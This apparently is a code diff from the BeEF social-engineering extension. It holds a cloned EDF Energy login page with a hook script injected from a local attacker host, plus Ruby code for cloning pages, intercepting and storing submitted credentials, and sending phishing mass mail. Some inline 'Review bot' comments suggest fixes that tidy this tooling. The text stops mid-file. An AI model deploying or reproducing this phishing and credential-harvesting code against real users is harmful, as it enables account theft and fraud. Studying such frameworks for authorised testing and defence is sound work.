</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>
<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous"> <input type='hidden' name='systemAlias'>
<input type='hidden' name='businessObjName'>
<input type='hidden' name='objValue'>
<input type='hidden' name='operation'>
<input type='hidden' name='usePost' value='false'>
<input type='hidden' name='source'>
<input type='hidden' name='resolvingMode' value='Default'>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
</span>
<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
<script>var disablePersonalize = true;</script>
<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
</SCRIPT>
<script>
document.body.style.margin=0;
document.body.scroll = "no";
</script>
<TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0 class="prtlHeaderCon" ><TR><TD>
<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<title>MyAccount</title>
<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>
<script type="text/javascript">
loadTrackCode('UA-25608035-1');
_gaq.push(['_trackPageview', 'Login']);
</script>
<script language="JavaScript">
/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
var Monitor_Flag1 = true;
document.onkeyup = checkKeyPressed;
window.history.forward(1);
function EDFEDisableSubmitButton1( button_text1, button_id1 )
{
var bid = button_id1;
var btext = button_text1;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
function checkCode()
{
if(event.keyCode==13)
{
event.keyCode=9;
}
}
function checkKeyPressed()
{
if(event.keyCode==13)
{
if(Monitor_Flag1!=null && Monitor_Flag1==true){
callGA('yes');
}
else
{
callGA('no');
}
}
}
function change(param1,param2)
{
param1.style.backgroundColor = param2;
}
function allValidChars(email)
{
var parsed = true;
var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
for (var i=0; i < email.length; i++)
{
var letter = email.charAt(i).toLowerCase();
if (validchars.indexOf(letter) != -1)
continue;
parsed = false;
break;
}
return parsed;
}
function trim(str) {
return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
}
function validateEmail(email)
{
var decision = true;
if(trim(email)!= null && trim(email) !=""){
if(email.match(emailRegEx)){
decision = true;
}else{
decision = false;
}
}else{
decision = false;
}
/*
if (! allValidChars(email))
{
decision = false;
}
if (email.indexOf("@") < 1)
{
decision = false;
}
if(email.indexOf("@")!=email.lastIndexOf("@"))
{
decision = false;
}
else if (email.lastIndexOf(".") <= email.indexOf("@"))
{
decision = false;
}
else if (email.indexOf("@") == email.length)
{
decision = false;
}
else if (email.indexOf("..") >=0)
{
decision = false;
}
else if (email.indexOf(".") == email.length)
{
decision = false;
}*/
if(!decision)
{
document.logonForm.f_username.focus();
change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes
document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
document.getElementById('errorMessage1').innerHTML = "";
}
else
{
change(document.logonForm.f_username,'#FFFFFF');
}
return decision;
}
function callGA(GA)
{
if(GA!=null && GA=="yes")
{
_gaq.push(['_trackPageview', 'LoginAttempted']);
}
var t = setTimeout("validateLogin()", 100);
}
function validateLogin()
{
var email = document.logonForm.f_username.value;
var pass = document.logonForm.f_passwd.value;
if(email==null || email=="")
{
document.logonForm.f_username.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
document.getElementById('errorMessage1').innerHTML = "";
return false;
}
else
{
if(validateEmail(email))
{
if(pass==null || pass=='')
{
document.logonForm.f_passwd.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your password";
document.getElementById('errorMessage1').innerHTML = "";
change(document.logonForm.f_passwd,'#FFFFFF');
return false;
}
else
{
change(document.logonForm.f_passwd,'#FFFFFF');
document.logonForm.action = "/nclogin.submit";
EDFEDisableSubmitButton1('Login','EDFElogonButton');
document.logonForm.submit();
}
}
}
}
function validateFU()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
document.logonForm.submit();
}
function validateFP()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
document.logonForm.submit();
}
function validateRegisterSME()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
document.logonForm.submit();
}
function validateRegisterResi()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
document.logonForm.submit();
}
function validateMR()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller";
document.logonForm.submit();
}
</script>
<script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head>
<body onLoad="history.forward(); document.logonForm.f_username.focus();">
<div id="wrap">
<div id="outer-right">
<div id="outer">
<!--------------------------- start top section ----------------------------------->
<script>
function performSearch()
{
var searchItem = document.getElementById('searchBox');
window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
}
function clearText()
{
document.getElementById('searchBox').value="";
}
function EDFEDisableSubmitButton( button_text, button_id )
{
var bid = button_id;
var btext = button_text;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
</script>
<!--------------------------- start top section ----------------------------------->
<div id="header">
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
</p>
<div id='logo'>
<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
</div><!-- start top utilities -->
<div id="toplinks">
<div class="left">
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>
<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
</ul>
</div>
<div class="right">
<ul>
<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
</ul>
<div id="searchform">
<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous"> <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
<input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
</div>
</div>
</div>
<div id="olympiclogo">
<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
</div><!-- end top utilities -->
<!-- start top navigation -->
<div id="topnav">
<div id="topnav-inner">
<p class="hide-element">
<a name="pnav" id="pnav">primary navigation</a>
</p>
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
</p>
<ul>
<li>
<a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
</li>
<li>
<a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
</li>
</ul>
<div class="clearFix"></div>
</div>
</div><!-- end top navigation -->
</div>
<!--------------------------- end top section ----------------------------------->
<!--------------------------- end top section ----------------------------------->
<div id="pagehold">
<!--------------------------- start left section ----------------------------------->
<SCRIPT>
function fnNavigateMenu(locationURL,navigParam,menuIden)
{
if (navigParam == 'false')
{
document.outsidemenu.menuidentifier.value = menuIden ;
document.outsidemenu.action = locationURL ;
document.outsidemenu.submit() ;
}
else
{
window.open(locationURL) ;
}
}
</SCRIPT>
<!-- start left section forgottenusername.html;forgottenpassword.html -->
<div id="leftnav-outer">
<div id="leftnav">
<ul>
<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>
<li>
<ul>
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
</ul>
</li>
<li>
<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
</ul>
</ul>
</li>
</ul>
<ul>
<br/><br/>
<div id="lpButtonDiv" align="center">
</div>
</ul>
</div>
</div>
<!-- end left section -->
<form name="outsidemenu" method="POST" action="/irj/portal/anonymous"> <input type="hidden" name="menuidentifier" value="">
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
<!--------------------------- end left section ----------------------------------->
<!--------------------------- start middle section ----------------------------------->
<div id="maincontent-wrap" class="fullwidth">
<p class="hide-element">
<a name="cont" id="cont">main content</a>
</p>
<div id="maincontent-full" class="nobanner">
<div id="banner" class="BannerWith2Circles">
<h1>
Login / Register
</h1>
<div id="banner_text_wrap">
<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
<div id="banner_text">
<p>
&nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
</p>
</div>
</div>
</div>
<div id="two-col-wrap" class="two_col_wrap_bg">
<div id="content" class="make-full">
<div id="data">
<div id="leftcolumn">
<h2>Login to MyAccount</h2>
<!-- Prototype Builder Start srm::-->
<form name="logonForm" method="post" action="/irj/portal/anonymous">
<span class="legacymessage">
</span>
<span class="legacymessage">
</span>
<span class="warningmessage" id="errorMessage"></span><BR/>
<span class="warningmessage" id="errorMessage1"></span>
<input type ="hidden" name = "f_method" value = "LOGIN" />
<table class="formfields" border="1" summary="Visual Layout for the login form">
<tbody>
<tr>
<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
</td>
</tr>
<tr>
<th><label for="f_passwd">Password<em>*</em></label></th><td>
<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
</td>
</tr>
</tbody>
</table>
<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
<br /><br /><br />
<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
<!-- Prototype Builder End -->
</div>
<div id="rightcolumn">
<h2>Register Today!</h2>
<p>&nbsp;</p>
<ul>
<li class="tick"> View and pay your bills</li>
<li class="tick"> Submit your meter reading</li>
<li class="tick"> Update your details</li>
<li class="tick"> Sign up for Direct Debit</li>
</ul><br/>
<table border=0><tr>
<td>
<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div>
</td><td>
&nbsp;&nbsp;&nbsp;</td>
<td> <div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
</td></tr>
</table>
<br/>
<p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<!--------------------------- end middle section ----------------------------------->
</div><!--pagehold-->
<!--------------------------- start bottom section ----------------------------------->
<script type="text/javascript">
var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
</script>
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
<script type="text/javascript">
function TermsAndConditions()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
}
function PrivacyPolicy()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
}
// Removes leading whitespaces
function LTrim( value ) {
var re = /\s*((\S+\s*)*)/;
return value.replace(re, "$1");
}
// Removes ending whitespaces
function RTrim( value ) {
var re = /((\s*\S+)*)\s*/;
return value.replace(re, "$1");
}
// Removes leading and ending whitespaces
function trim( value ) {
return LTrim(RTrim(value));
}
</script>
<!-- start bottom section -->
<div id="footer">
<ul>
<li>
<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
</li>
<li>
<a href="javascript:PrivacyPolicy();">Privacy</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
</li>
<li class="last">
<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
</li>
</ul>
<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
</div>
<!-- end bottom section -->
<SCRIPT>
document.body.scroll = "";
</SCRIPT>
<!--------------------------- end bottom section ----------------------------------->
</div><!--outer-->
</div>
</div><!--wrap-->
</body>
</html>
</TD></TR></TABLE>
</body></html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.9 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 864 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.5 KiB


@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class Interceptor
include DataMapper::Resource
storage_names[:default] = 'extension_seng_interceptor'
property :id, Serial
property :ip, Text, :lazy => false
property :post_data, Text, :lazy => false
belongs_to :webcloner
end
end
end
end


@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class Massmailer
include DataMapper::Resource
storage_names[:default] = 'extension_seng_massmailer'
property :id, Serial
#todo fields
end
end
end
end


@@ -0,0 +1,36 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Models
class Webcloner
include DataMapper::Resource
storage_names[:default] = 'extension_seng_webcloner'
property :id, Serial
property :uri, Text, :lazy => false
property :mount, Text, :lazy => false
has n, :extension_seng_interceptor, 'Interceptor'
end
end
end
end


@@ -0,0 +1,131 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class SEngRest < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
#Example: curl -H "Content-Type: application/json; charset=UTF-8"
#-d '{"url":"https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=
#https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2", "mount":"/url"}'
#-X POST http://127.0.0.1:3000/api/seng/clone_page?token=851a937305f8773ee82f5259e792288cdcb01cd7
post '/clone_page' do
request.body.rewind
begin
body = JSON.parse request.body.read
uri = body["url"]
mount = body["mount"]
use_existing = body["use_existing"]
if uri != nil && mount != nil
if (uri =~ URI::regexp).nil? #invalid URI
print_error "Invalid URI"
halt 401
end
if !mount[/^\//] # mount needs to start with /
print_error "Invalid mount (need to be a relative path, and start with / )"
halt 401
end
web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
success = web_cloner.clone_page(uri,mount,use_existing)
if success
result = {
"success" => true,
"mount" => mount
}.to_json
else
result = {
"success" => false
}.to_json
end
end
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
error 400 # Bad Request
end
end
# Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body'
#-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7
# Example json_body:
#{
# "template": "default",
# "subject": "Hi from BeEF",
# "fromname": "BeEF",
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
# "linktext": "http://beefproject.com",
# "recipients": [{
# "user1@gmail.com": "Michele",
# "user2@antisnatchor.com": "Antisnatchor"
#}]
#}
post '/send_mails' do
request.body.rewind
begin
body = JSON.parse request.body.read
template = body["template"]
subject = body["subject"]
fromname = body["fromname"]
link = body["link"]
linktext = body["linktext"]
if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
print_error "All parameters are mandatory."
halt 401
end
if (link =~ URI::regexp).nil?#invalid URI
print_error "Invalid link or linktext"
halt 401
end
recipients = body["recipients"][0]
recipients.each do |email,name|
if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil?
print_error "Email [#{email}] or name [#{name}] are not valid/null."
halt 401
end
end
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
error 400
end
end
end
end
end
end
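Review bot: The `before` filter compares the API token with `==` (`params[:token] == config.get('beef.api_token')`), which is not a constant-time comparison, and it takes the token from the query string, where it is likely to be recorded in access and proxy logs. I would change the check to `error 401 unless Rack::Utils.secure_compare(params[:token].to_s, config.get('beef.api_token').to_s)`. Also in this section, the `rescue Exception` in `post '/send_mails'` logs "Invalid JSON input passed to endpoint /api/seng/clone_page" for every failure, so a missing `recipients` array or a mail delivery error is reported under the wrong endpoint and the wrong cause. Rescuing `JSON::ParserError` on its own and naming `/api/seng/send_mails` in the message would keep the log accurate.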


@@ -0,0 +1,61 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
require 'sinatra/base'
class Interceptor < Sinatra::Base
configure do
set :show_exceptions, false
end
# intercept GET
get "/" do
print_info "GET request from IP #{request.ip}"
print_info "Referer: #{request.referer}"
cloned_page = settings.cloned_page
cloned_page
end
# intercept POST
post "/" do
print_info "POST request from IP #{request.ip}"
request.body.rewind
data = request.body.read
print_info "Intercepted data:"
print_info data
interceptor_db = BeEF::Core::Models::Interceptor.new(
:webcloner_id => settings.db_entry.id,
:post_data => data,
:ip => request.ip
)
interceptor_db.save
if settings.frameable
print_info "Page can be framed :-) Loading original URL into iFrame..."
"<html><head><script type=\"text/javascript\" src=\"#{settings.beef_hook}\"></script>\n</head></head><body><iframe src=\"#{settings.redirect_to}\" style=\"border:none; background-color:white; width:100%; height:100%; position:absolute; top:0px; left:0px; padding:0px; margin:0px\"></iframe></body></html>"
else
print_info "Page can not be framed :-) Redirecting to original URL..."
redirect settings.redirect_to
end
end
end
end
end
end
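Review bot: `post "/"` writes the full request body to the console with `print_info data` in addition to saving it in `post_data`, so any credentials submitted during an engagement are copied into terminal scrollback and into whatever captures the console output. Logging only the size, e.g. `print_info "Intercepted data: #{data.bytesize} bytes"`, keeps the sensitive values in the one store that can be access-controlled and purged afterwards. The inline HTML in the frameable branch also closes `</head>` twice and interpolates `settings.redirect_to` into the `src` attribute without HTML-escaping.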


@@ -0,0 +1,178 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class WebCloner
include Singleton
def initialize
@http_server = BeEF::Core::Server.instance
@config = BeEF::Core::Configuration.instance
@cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
